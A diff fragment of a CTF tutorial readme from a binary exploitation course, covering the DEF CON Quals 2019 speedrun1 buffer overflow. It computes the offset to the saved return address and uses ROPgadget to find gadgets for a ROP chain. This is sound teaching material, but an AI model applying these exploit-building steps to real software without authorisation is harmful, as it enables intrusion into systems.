guyinatuxedo/new_nightmare/modules/07-bof_static/dcquals19_speedrun1/readme.md

   rbp at 0x7fffffffde30, rip at 0x7fffffffde38
 ```

 So we can see that the offset is `0x7fffffffde38 - 0x7fffffffda30 = 0x408` bytes.
 With that, the last thing we need is to find the ROP gadgets we will use.
-This time we will be using a utility called `ROPgadget` from https://github.com/JonathanSalwan/ROPgadget.
+This time we will be using a utility called `ROPgadget` from https://github.com/JonathanSalwan/ROPgadget (not included as part of nightmare).
 This will just be a python script which will give us gadgets for a binary we give it.
 First let's just get four gadgets to just pop values into the four registers we need:

 ```
-$    python ROPgadget.py --binary speedrun-001 | grep "pop rax ; ret"
+$   python3 ROPgadget.py --binary speedrun-001 | grep "pop rax ; ret"
 0x0000000000415662 : add ch, al ; pop rax ; ret
 0x0000000000415661 : cli ; add ch, al ; pop rax ; ret
 0x00000000004a9321 : in al, 0x4c ; pop rax ; retf